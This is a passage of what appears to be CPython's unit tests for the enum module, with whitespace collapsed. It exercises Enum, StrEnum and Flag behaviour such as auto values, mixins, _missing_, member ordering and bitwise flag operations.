6.0268e7) URANUS = (8.686e+25, 2.5559e7) NEPTUNE = (1.024e+26, 2.4746e7) def __init__(self, mass, radius): self.mass = mass # in kilograms self.radius = radius # in meters @property def surface_gravity(self): # universal gravitational constant (m3 kg-1 s-2) G = 6.67300E-11 return G * self.mass / (self.radius * self.radius) self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80) self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6)) def test_ignore(self): class Period(timedelta, Enum): ''' different lengths of time ''' def __new__(cls, value, period): obj = timedelta.__new__(cls, value) obj._value_ = value obj.period = period return obj _ignore_ = 'Period i' Period = vars() for i in range(13): Period['month_%d' % i] = i*30, 'month' for i in range(53): Period['week_%d' % i] = i*7, 'week' for i in range(32): Period['day_%d' % i] = i, 'day' OneDay = day_1 OneWeek = week_1 OneMonth = month_1 self.assertFalse(hasattr(Period, '_ignore_')) self.assertFalse(hasattr(Period, 'Period')) self.assertFalse(hasattr(Period, 'i')) self.assertTrue(isinstance(Period.day_1, timedelta)) self.assertTrue(Period.month_1 is Period.day_30) self.assertTrue(Period.week_4 is Period.day_28) def test_nonhash_value(self): class AutoNumberInAList(Enum): def __new__(cls): value = [len(cls.__members__) + 1] obj = object.__new__(cls) obj._value_ = value return obj class ColorInAList(AutoNumberInAList): red = () green = () blue = () self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue]) for enum, value in zip(ColorInAList, range(3)): value += 1 self.assertEqual(enum.value, [value]) self.assertIs(ColorInAList([value]), enum) def test_conflicting_types_resolved_in_new(self): class LabelledIntEnum(int, Enum): def __new__(cls, *args): value, label = args obj = int.__new__(cls, value) obj.label = label obj._value_ = value return obj class LabelledList(LabelledIntEnum): unprocessed = (1, "Unprocessed") payment_complete = (2, "Payment Complete") self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete]) self.assertEqual(LabelledList.unprocessed, 1) self.assertEqual(LabelledList(1), LabelledList.unprocessed) def test_auto_number(self): class Color(Enum): red = auto() blue = auto() green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 1) self.assertEqual(Color.blue.value, 2) self.assertEqual(Color.green.value, 3) def test_auto_name(self): class Color(Enum): def _generate_next_value_(name, start, count, last): return name red = auto() blue = auto() green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 'red') self.assertEqual(Color.blue.value, 'blue') self.assertEqual(Color.green.value, 'green') def test_auto_name_inherit(self): class AutoNameEnum(Enum): def _generate_next_value_(name, start, count, last): return name class Color(AutoNameEnum): red = auto() blue = auto() green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 'red') self.assertEqual(Color.blue.value, 'blue') self.assertEqual(Color.green.value, 'green') def test_auto_garbage(self): class Color(Enum): red = 'red' blue = auto() self.assertEqual(Color.blue.value, 1) def test_auto_garbage_corrected(self): class Color(Enum): red = 'red' blue = 2 green = auto() self.assertEqual(list(Color), [Color.red, Color.blue, Color.green]) self.assertEqual(Color.red.value, 'red') self.assertEqual(Color.blue.value, 2) self.assertEqual(Color.green.value, 3) def test_auto_order(self): with self.assertRaises(TypeError): class Color(Enum): red = auto() green = auto() blue = auto() def _generate_next_value_(name, start, count, last): return name def test_auto_order_wierd(self): weird_auto = auto() weird_auto.value = 'pathological case' class Color(Enum): red = weird_auto def _generate_next_value_(name, start, count, last): return name blue = auto() self.assertEqual(list(Color), [Color.red, Color.blue]) self.assertEqual(Color.red.value, 'pathological case') self.assertEqual(Color.blue.value, 'blue') def test_duplicate_auto(self): class Dupes(Enum): first = primero = auto() second = auto() third = auto() self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes)) def test_default_missing(self): class Color(Enum): RED = 1 GREEN = 2 BLUE = 3 try: Color(7) except ValueError as exc: self.assertTrue(exc.__context__ is None) else: raise Exception('Exception not raised.') def test_missing(self): class Color(Enum): red = 1 green = 2 blue = 3 @classmethod def _missing_(cls, item): if item == 'three': return cls.blue elif item == 'bad return': # trigger internal error return 5 elif item == 'error out': raise ZeroDivisionError else: # trigger not found return None self.assertIs(Color('three'), Color.blue) try: Color(7) except ValueError as exc: self.assertTrue(exc.__context__ is None) else: raise Exception('Exception not raised.') try: Color('bad return') except TypeError as exc: self.assertTrue(isinstance(exc.__context__, ValueError)) else: raise Exception('Exception not raised.') try: Color('error out') except ZeroDivisionError as exc: self.assertTrue(isinstance(exc.__context__, ValueError)) else: raise Exception('Exception not raised.') def test_missing_exceptions_reset(self): import gc import weakref # class TestEnum(enum.Enum): VAL1 = 'val1' VAL2 = 'val2' # class Class1: def __init__(self): # Gracefully handle an exception of our own making try: raise ValueError() except ValueError: pass # class Class2: def __init__(self): # Gracefully handle an exception of Enum's making try: TestEnum('invalid_value') except ValueError: pass # No strong refs here so these are free to die. class_1_ref = weakref.ref(Class1()) class_2_ref = weakref.ref(Class2()) # # The exception raised by Enum creates a reference loop and thus # Class2 instances will stick around until the next garbage collection # cycle, unlike Class1. gc.collect() # For PyPy or other GCs. self.assertIs(class_1_ref(), None) self.assertIs(class_2_ref(), None) def test_multiple_mixin(self): class MaxMixin: @classproperty def MAX(cls): max = len(cls) cls.MAX = max return max class StrMixin: def __str__(self): return self._name_.lower() class SomeEnum(Enum): def behavior(self): return 'booyah' class AnotherEnum(Enum): def behavior(self): return 'nuhuh!' def social(self): return "what's up?" class Color(MaxMixin, Enum): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 3) self.assertEqual(Color.MAX, 3) self.assertEqual(str(Color.BLUE), 'BLUE') class Color(MaxMixin, StrMixin, Enum): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 3) self.assertEqual(Color.MAX, 3) self.assertEqual(str(Color.BLUE), 'blue') class Color(StrMixin, MaxMixin, Enum): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(Color.RED.value, 1) self.assertEqual(Color.GREEN.value, 2) self.assertEqual(Color.BLUE.value, 3) self.assertEqual(Color.MAX, 3) self.assertEqual(str(Color.BLUE), 'blue') class CoolColor(StrMixin, SomeEnum, Enum): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(CoolColor.RED.value, 1) self.assertEqual(CoolColor.GREEN.value, 2) self.assertEqual(CoolColor.BLUE.value, 3) self.assertEqual(str(CoolColor.BLUE), 'blue') self.assertEqual(CoolColor.RED.behavior(), 'booyah') class CoolerColor(StrMixin, AnotherEnum, Enum): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(CoolerColor.RED.value, 1) self.assertEqual(CoolerColor.GREEN.value, 2) self.assertEqual(CoolerColor.BLUE.value, 3) self.assertEqual(str(CoolerColor.BLUE), 'blue') self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!') self.assertEqual(CoolerColor.RED.social(), "what's up?") class CoolestColor(StrMixin, SomeEnum, AnotherEnum): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(CoolestColor.RED.value, 1) self.assertEqual(CoolestColor.GREEN.value, 2) self.assertEqual(CoolestColor.BLUE.value, 3) self.assertEqual(str(CoolestColor.BLUE), 'blue') self.assertEqual(CoolestColor.RED.behavior(), 'booyah') self.assertEqual(CoolestColor.RED.social(), "what's up?") class ConfusedColor(StrMixin, AnotherEnum, SomeEnum): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(ConfusedColor.RED.value, 1) self.assertEqual(ConfusedColor.GREEN.value, 2) self.assertEqual(ConfusedColor.BLUE.value, 3) self.assertEqual(str(ConfusedColor.BLUE), 'blue') self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!') self.assertEqual(ConfusedColor.RED.social(), "what's up?") class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum): RED = auto() GREEN = auto() BLUE = auto() self.assertEqual(ReformedColor.RED.value, 1) self.assertEqual(ReformedColor.GREEN.value, 2) self.assertEqual(ReformedColor.BLUE.value, 3) self.assertEqual(str(ReformedColor.BLUE), 'blue') self.assertEqual(ReformedColor.RED.behavior(), 'booyah') self.assertEqual(ConfusedColor.RED.social(), "what's up?") self.assertTrue(issubclass(ReformedColor, int)) def test_multiple_inherited_mixin(self): @unique class Decision1(StrEnum): REVERT = "REVERT" REVERT_ALL = "REVERT_ALL" RETRY = "RETRY" class MyEnum(StrEnum): pass @unique class Decision2(MyEnum): REVERT = "REVERT" REVERT_ALL = "REVERT_ALL" RETRY = "RETRY" def test_multiple_mixin_inherited(self): class MyInt(int): def __new__(cls, value): return super().__new__(cls, value) class HexMixin: def __repr__(self): return hex(self) class MyIntEnum(HexMixin, MyInt, enum.Enum): pass class Foo(MyIntEnum): TEST = 1 self.assertTrue(isinstance(Foo.TEST, MyInt)) self.assertEqual(repr(Foo.TEST), "0x1") class Fee(MyIntEnum): TEST = 1 def __new__(cls, value): value += 1 member = int.__new__(cls, value) member._value_ = value return member self.assertEqual(Fee.TEST, 2) def test_miltuple_mixin_with_common_data_type(self): class CaseInsensitiveStrEnum(str, Enum): @classmethod def _missing_(cls, value): for member in cls._member_map_.values(): if member._value_.lower() == value.lower(): return member return super()._missing_(value) # class LenientStrEnum(str, Enum): def __init__(self, *args): self._valid = True @classmethod def _missing_(cls, value): unknown = cls._member_type_.__new__(cls, value) unknown._valid = False unknown._name_ = value.upper() unknown._value_ = value cls._member_map_[value] = unknown return unknown @property def valid(self): return self._valid # class JobStatus(CaseInsensitiveStrEnum, LenientStrEnum): ACTIVE = "active" PENDING = "pending" TERMINATED = "terminated" # JS = JobStatus self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED]) self.assertEqual(JS.ACTIVE, 'active') self.assertEqual(JS.ACTIVE.value, 'active') self.assertIs(JS('Active'), JS.ACTIVE) self.assertTrue(JS.ACTIVE.valid) missing = JS('missing') self.assertEqual(list(JobStatus), [JS.ACTIVE, JS.PENDING, JS.TERMINATED]) self.assertEqual(JS.ACTIVE, 'active') self.assertEqual(JS.ACTIVE.value, 'active') self.assertIs(JS('Active'), JS.ACTIVE) self.assertTrue(JS.ACTIVE.valid) self.assertTrue(isinstance(missing, JS)) self.assertFalse(missing.valid) def test_empty_globals(self): # bpo-35717: sys._getframe(2).f_globals['__name__'] fails with KeyError # when using compile and exec because f_globals is empty code = "from enum import Enum; Enum('Animal', 'ANT BEE CAT DOG')" code = compile(code, "<string>", "exec") global_ns = {} local_ls = {} exec(code, global_ns, local_ls) def test_strenum(self): class GoodStrEnum(StrEnum): one = '1' two = '2' three = b'3', 'ascii' four = b'4', 'latin1', 'strict' self.assertEqual(GoodStrEnum.one, '1') self.assertEqual(str(GoodStrEnum.one), '1') self.assertEqual('{}'.format(GoodStrEnum.one), '1') self.assertEqual(GoodStrEnum.one, str(GoodStrEnum.one)) self.assertEqual(GoodStrEnum.one, '{}'.format(GoodStrEnum.one)) self.assertEqual(repr(GoodStrEnum.one), 'GoodStrEnum.one') # class DumbMixin: def __str__(self): return "don't do this" class DumbStrEnum(DumbMixin, StrEnum): five = '5' six = '6' seven = '7' self.assertEqual(DumbStrEnum.seven, '7') self.assertEqual(str(DumbStrEnum.seven), "don't do this") # class EnumMixin(Enum): def hello(self): print('hello from %s' % (self, )) class HelloEnum(EnumMixin, StrEnum): eight = '8' self.assertEqual(HelloEnum.eight, '8') self.assertEqual(HelloEnum.eight, str(HelloEnum.eight)) # class GoodbyeMixin: def goodbye(self): print('%s wishes you a fond farewell') class GoodbyeEnum(GoodbyeMixin, EnumMixin, StrEnum): nine = '9' self.assertEqual(GoodbyeEnum.nine, '9') self.assertEqual(GoodbyeEnum.nine, str(GoodbyeEnum.nine)) # with self.assertRaisesRegex(TypeError, '1 is not a string'): class FirstFailedStrEnum(StrEnum): one = 1 two = '2' with self.assertRaisesRegex(TypeError, "2 is not a string"): class SecondFailedStrEnum(StrEnum): one = '1' two = 2, three = '3' with self.assertRaisesRegex(TypeError, '2 is not a string'): class ThirdFailedStrEnum(StrEnum): one = '1' two = 2 with self.assertRaisesRegex(TypeError, 'encoding must be a string, not %r' % (sys.getdefaultencoding, )): class ThirdFailedStrEnum(StrEnum): one = '1' two = b'2', sys.getdefaultencoding with self.assertRaisesRegex(TypeError, 'errors must be a string, not 9'): class ThirdFailedStrEnum(StrEnum): one = '1' two = b'2', 'ascii', 9 @unittest.skipIf( python_version >= (3, 12), 'mixin-format now uses member instead of member.value', ) def test_custom_strenum_with_warning(self): class CustomStrEnum(str, Enum): pass class OkayEnum(CustomStrEnum): one = '1' two = '2' three = b'3', 'ascii' four = b'4', 'latin1', 'strict' self.assertEqual(OkayEnum.one, '1') self.assertEqual(str(OkayEnum.one), 'one') with self.assertWarns(DeprecationWarning): self.assertEqual('{}'.format(OkayEnum.one), '1') self.assertEqual(OkayEnum.one, '{}'.format(OkayEnum.one)) self.assertEqual(repr(OkayEnum.one), 'OkayEnum.one') # class DumbMixin: def __str__(self): return "don't do this" class DumbStrEnum(DumbMixin, CustomStrEnum): five = '5' six = '6' seven = '7' self.assertEqual(DumbStrEnum.seven, '7') self.assertEqual(str(DumbStrEnum.seven), "don't do this") # class EnumMixin(Enum): def hello(self): print('hello from %s' % (self, )) class HelloEnum(EnumMixin, CustomStrEnum): eight = '8' self.assertEqual(HelloEnum.eight, '8') self.assertEqual(str(HelloEnum.eight), 'eight') # class GoodbyeMixin: def goodbye(self): print('%s wishes you a fond farewell') class GoodbyeEnum(GoodbyeMixin, EnumMixin, CustomStrEnum): nine = '9' self.assertEqual(GoodbyeEnum.nine, '9') self.assertEqual(str(GoodbyeEnum.nine), 'nine') # class FirstFailedStrEnum(CustomStrEnum): one = 1 # this will become '1' two = '2' class SecondFailedStrEnum(CustomStrEnum): one = '1' two = 2, # this will become '2' three = '3' class ThirdFailedStrEnum(CustomStrEnum): one = '1' two = 2 # this will become '2' with self.assertRaisesRegex(TypeError, '.encoding. must be str, not '): class ThirdFailedStrEnum(CustomStrEnum): one = '1' two = b'2', sys.getdefaultencoding with self.assertRaisesRegex(TypeError, '.errors. must be str, not '): class ThirdFailedStrEnum(CustomStrEnum): one = '1' two = b'2', 'ascii', 9 @unittest.skipIf( python_version < (3, 12), 'mixin-format currently uses member.value', ) def test_custom_strenum(self): class CustomStrEnum(str, Enum): pass class OkayEnum(CustomStrEnum): one = '1' two = '2' three = b'3', 'ascii' four = b'4', 'latin1', 'strict' self.assertEqual(OkayEnum.one, '1') self.assertEqual(str(OkayEnum.one), 'one') self.assertEqual('{}'.format(OkayEnum.one), 'one') self.assertEqual(repr(OkayEnum.one), 'OkayEnum.one') # class DumbMixin: def __str__(self): return "don't do this" class DumbStrEnum(DumbMixin, CustomStrEnum): five = '5' six = '6' seven = '7' self.assertEqual(DumbStrEnum.seven, '7') self.assertEqual(str(DumbStrEnum.seven), "don't do this") # class EnumMixin(Enum): def hello(self): print('hello from %s' % (self, )) class HelloEnum(EnumMixin, CustomStrEnum): eight = '8' self.assertEqual(HelloEnum.eight, '8') self.assertEqual(str(HelloEnum.eight), 'eight') # class GoodbyeMixin: def goodbye(self): print('%s wishes you a fond farewell') class GoodbyeEnum(GoodbyeMixin, EnumMixin, CustomStrEnum): nine = '9' self.assertEqual(GoodbyeEnum.nine, '9') self.assertEqual(str(GoodbyeEnum.nine), 'nine') # class FirstFailedStrEnum(CustomStrEnum): one = 1 # this will become '1' two = '2' class SecondFailedStrEnum(CustomStrEnum): one = '1' two = 2, # this will become '2' three = '3' class ThirdFailedStrEnum(CustomStrEnum): one = '1' two = 2 # this will become '2' with self.assertRaisesRegex(TypeError, '.encoding. must be str, not '): class ThirdFailedStrEnum(CustomStrEnum): one = '1' two = b'2', sys.getdefaultencoding with self.assertRaisesRegex(TypeError, '.errors. must be str, not '): class ThirdFailedStrEnum(CustomStrEnum): one = '1' two = b'2', 'ascii', 9 def test_missing_value_error(self): with self.assertRaisesRegex(TypeError, "_value_ not set in __new__"): class Combined(str, Enum): # def __new__(cls, value, sequence): enum = str.__new__(cls, value) if '(' in value: fis_name, segment = value.split('(', 1) segment = segment.strip(' )') else: fis_name = value segment = None enum.fis_name = fis_name enum.segment = segment enum.sequence = sequence return enum # def __repr__(self): return "<%s.%s>" % (self.__class__.__name__, self._name_) # key_type = 'An$(1,2)', 0 company_id = 'An$(3,2)', 1 code = 'An$(5,1)', 2 description = 'Bn$', 3 @unittest.skipUnless( python_version == (3, 9), 'private variables are now normal attributes', ) def test_warning_for_private_variables(self): with self.assertWarns(DeprecationWarning): class Private(Enum): __corporal = 'Radar' self.assertEqual(Private._Private__corporal.value, 'Radar') try: with self.assertWarns(DeprecationWarning): class Private(Enum): __major_ = 'Hoolihan' except ValueError: pass def test_private_variable_is_normal_attribute(self): class Private(Enum): __corporal = 'Radar' __major_ = 'Hoolihan' self.assertEqual(Private._Private__corporal, 'Radar') self.assertEqual(Private._Private__major_, 'Hoolihan') @unittest.skipUnless( python_version < (3, 12), 'member-member access now raises an exception', ) def test_warning_for_member_from_member_access(self): with self.assertWarns(DeprecationWarning): class Di(Enum): YES = 1 NO = 0 nope = Di.YES.NO self.assertIs(Di.NO, nope) @unittest.skipUnless( python_version >= (3, 12), 'member-member access currently issues a warning', ) def test_exception_for_member_from_member_access(self): with self.assertRaisesRegex(AttributeError, "Di: no instance attribute .NO."): class Di(Enum): YES = 1 NO = 0 nope = Di.YES.NO def test_strenum_auto(self): class Strings(StrEnum): ONE = auto() TWO = auto() self.assertEqual([Strings.ONE, Strings.TWO], ['one', 'two']) def test_dynamic_members_with_static_methods(self): # foo_defines = {'FOO_CAT': 'aloof', 'BAR_DOG': 'friendly', 'FOO_HORSE': 'big'} class Foo(Enum): vars().update({ k: v for k, v in foo_defines.items() if k.startswith('FOO_') }) def upper(self): return self.value.upper() self.assertEqual(list(Foo), [Foo.FOO_CAT, Foo.FOO_HORSE]) self.assertEqual(Foo.FOO_CAT.value, 'aloof') self.assertEqual(Foo.FOO_HORSE.upper(), 'BIG') # with self.assertRaisesRegex(TypeError, "'FOO_CAT' already defined as: 'aloof'"): class FooBar(Enum): vars().update({ k: v for k, v in foo_defines.items() if k.startswith('FOO_') }, **{'FOO_CAT': 'small'}, ) def upper(self): return self.value.upper() class TestOrder(unittest.TestCase): def test_same_members(self): class Color(Enum): _order_ = 'red green blue' red = 1 green = 2 blue = 3 def test_same_members_with_aliases(self): class Color(Enum): _order_ = 'red green blue' red = 1 green = 2 blue = 3 verde = green def test_same_members_wrong_order(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue' red = 1 blue = 3 green = 2 def test_order_has_extra_members(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue purple' red = 1 green = 2 blue = 3 def test_order_has_extra_members_with_aliases(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue purple' red = 1 green = 2 blue = 3 verde = green def test_enum_has_extra_members(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue' red = 1 green = 2 blue = 3 purple = 4 def test_enum_has_extra_members_with_aliases(self): with self.assertRaisesRegex(TypeError, 'member order does not match _order_'): class Color(Enum): _order_ = 'red green blue' red = 1 green = 2 blue = 3 purple = 4 verde = green class TestFlag(unittest.TestCase): """Tests of the Flags.""" class Perm(Flag): R, W, X = 4, 2, 1 class Open(Flag): RO = 0 WO = 1 RW = 2 AC = 3 CE = 1<<19 class Color(Flag): BLACK = 0 RED = 1 ROJO = 1 GREEN = 2 BLUE = 4 PURPLE = RED|BLUE WHITE = RED|GREEN|BLUE BLANCO = RED|GREEN|BLUE def test_str(self): Perm = self.Perm self.assertEqual(str(Perm.R), 'R') self.assertEqual(str(Perm.W), 'W') self.assertEqual(str(Perm.X), 'X') self.assertEqual(str(Perm.R | Perm.W), 'R|W') self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X') self.assertEqual(str(Perm(0)), 'Perm(0)') self.assertEqual(str(~Perm.R), 'W|X') self.assertEqual(str(~Perm.W), 'R|X') self.assertEqual(str(~Perm.X), 'R|W') self.assertEqual(str(~(Perm.R | Perm.W)), 'X') self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)') self.assertEqual(str(Perm(~0)), 'R|W|X') Open = self.Open self.assertEqual(str(Open.RO), 'RO') self.assertEqual(str(Open.WO), 'WO') self.assertEqual(str(Open.AC), 'AC') self.assertEqual(str(Open.RO | Open.CE), 'CE') self.assertEqual(str(Open.WO | Open.CE), 'WO|CE') self.assertEqual(str(~Open.RO), 'WO|RW|CE') self.assertEqual(str(~Open.WO), 'RW|CE') self.assertEqual(str(~Open.AC), 'CE') self.assertEqual(str(~(Open.RO | Open.CE)), 'AC') self.assertEqual(str(~(Open.WO | Open.CE)), 'RW') def test_repr(self): Perm = self.Perm self.assertEqual(repr(Perm.R), 'Perm.R') self.assertEqual(repr(Perm.W), 'Perm.W') self.assertEqual(repr(Perm.X), 'Perm.X') self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W') self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X') self.assertEqual(repr(Perm(0)), '0x0') self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X') self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X') self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W') self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X') self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0') self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X') Open = self.Open self.assertEqual(repr(Open.RO), 'Open.RO') self.assertEqual(repr(Open.WO), 'Open.WO') self.assertEqual(repr(Open.AC), 'Open.AC') self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE') self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE') self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE') self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE') self.assertEqual(repr(~Open.AC), 'Open.CE') self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC') self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW') def test_format(self): Perm = self.Perm self.assertEqual(format(Perm.R, ''), 'R') self.assertEqual(format(Perm.R | Perm.X, ''), 'R|X') def test_or(self): Perm = self.Perm for i in Perm: for j in Perm: self.assertEqual((i | j), Perm(i.value | j.value)) self.assertEqual((i | j).value, i.value | j.value) self.assertIs(type(i | j), Perm) for i in Perm: self.assertIs(i | i, i) Open = self.Open self.assertIs(Open.RO | Open.CE, Open.CE) def test_and(self): Perm = self.Perm RW = Perm.R | Perm.W RX = Perm.R | Perm.X WX = Perm.W | Perm.X RWX = Perm.R | Perm.W | Perm.X values = list(Perm) + [RW, RX, WX, RWX, Perm(0)] for i in values: for j in values: self.assertEqual((i & j).value, i.value & j.value) self.assertIs(type(i & j), Perm) for i in Perm: self.assertIs(i & i, i) self.assertIs(i & RWX, i) self.assertIs(RWX & i, i) Open = self.Open self.assertIs(Open.RO & Open.CE, Open.RO) def test_xor(self): Perm = self.Perm for i in Perm: for j in Perm: self.assertEqual((i ^ j).value, i.value ^ j.value) self.assertIs(type(i ^ j), Perm) for i in Perm: self.assertIs(i ^ Perm(0), i) self.assertIs(Perm(0) ^ i, i) Open = self.Open self.assertIs(Open.RO ^ Open.CE, Open.CE) self.assertIs(Open.CE ^ Open.CE, Open.RO) def test_invert(self): Perm = self.Perm RW = Perm.R | Perm.W RX = Perm.R | Perm.X WX = Perm.W | Perm.X RWX = Perm.R | Perm.W | Perm.X values = list(Perm) + [RW, RX, WX, RWX, Perm(0)] for i in values: self.assertIs(type(~i), Perm) self.assertEqual(~~i, i) for i in Perm: self.assertIs(~~i, i) Open = self.Open self.assertIs(Open.WO & ~Open.WO, Open.RO) self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE) def test_bool(self): Perm = self.Perm for f in Perm: self.assertTrue(f) Open = self.Open for f in Open: self.assertEqual(bool(f.value), bool(f)) def test_boundary(self): self.assertIs(enum.Flag._boundary_, STRICT) class Iron(Flag, boundary=STRICT): ONE = 1 TWO = 2 EIGHT = 8 self.assertIs(Iron._boundary_, STRICT) # class Water(Flag, boundary=CONFORM): ONE = 1 TWO = 2 EIGHT = 8 self.assertIs(Water._boundary_, CONFORM) # class Space(Flag, boundary=EJECT): ONE = 1 TWO = 2 EIGHT = 8 self.assertIs(Space._boundary_, EJECT) # class Bizarre(Flag, boundary=KEEP): b = 3 c = 4 d = 6 # self.assertRaisesRegex(ValueError, 'invalid value: 7', Iron, 7) # self.assertIs(Water(7), Water.ONE|Water.TWO) self.assertIs(Water(~9), Water.TWO) # self.assertEqual(Space(7), 7) self.assertTrue(type(Space(7)) is int) # self.assertEqual(list(Bizarre), [Bizarre.c]) self.assertIs(Bizarre(3), Bizarre.b) self.assertIs(Bizarre(6), Bizarre.d) def test_iter(self): Color = self.Color Open = self.Open self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE]) self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE]) def test_programatic_function_string(self): Perm = Flag('Perm', 'R W X') lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1<<i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_string_with_start(self): Perm = Flag('Perm', 'R W X', start=8) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 8<<i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_string_list(self): Perm = Flag('Perm', ['R', 'W', 'X']) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1<<i e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_iterable(self): Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32))) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1<<(2*i+1) e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_programatic_function_from_dict(self): Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32)))) lst = list(Perm) self.assertEqual(len(lst), len(Perm)) self.assertEqual(len(Perm), 3, Perm) self.assertEqual(lst, [Perm.R, Perm.W, Perm.X]) for i, n in enumerate('R W X'.split()): v = 1<<(2*i+1) e = Perm(v) self.assertEqual(e.value, v) self.assertEqual(type(e.value), int) self.assertEqual(e.name, n) self.assertIn(e, Perm) self.assertIs(type(e), Perm) def test_pickle(self): if isinstance(FlagStooges, Exception): raise FlagStooges test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE) test_pickle_dump_load(self.assertIs, FlagStooges) @unittest.skipIf( python_version >= (3, 12), '__contains__ now returns True/False for all inputs', ) def test_contains_er(self): Open = self.Open Color = self.Color self.assertFalse(Color.BLACK in Open) self.assertFalse(Open.RO in Color) with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 'BLACK' in Color with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 'RO' in Open with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 1 in Color with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 1 in Open @unittest.skipIf( python_version < (3, 12), '__contains__ only works with enum memmbers before 3.12', ) def test_contains_tf(self): Open = self.Open Color = self.Color self.assertFalse(Color.BLACK in Open) self.assertFalse(Open.RO in Color) self.assertFalse('BLACK' in Color) self.assertFalse('RO' in Open) self.assertTrue(1 in Color) self.assertTrue(1 in Open) def test_member_contains(self): Perm = self.Perm R, W, X = Perm RW = R | W RX = R | X WX = W | X RWX = R | W | X self.assertTrue(R in RW) self.assertTrue(R in RX) self.assertTrue(R in RWX) self.assertTrue(W in RW) self.assertTrue(W in WX) self.assertTrue(W in RWX) self.assertTrue(X in RX) self.assertTrue(X in WX) self.assertTrue(X in RWX) self.assertFalse(R in WX) self.assertFalse(W in RX) self.assertFalse(X in RW) def test_member_iter(self): Color = self.Color self.assertEqual(list(Color.BLACK), []) self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE]) self.assertEqual(list(Color.BLUE), [Color.BLUE]) self.assertEqual(list(Color.GREEN), [Color.GREEN]) self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE]) self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE]) def test_member_length(self): self.assertEqual(self.Color.__len__(self.Color.BLACK), 0) self.assertEqual(self.Color.__len__(self.Color.GREEN), 1) 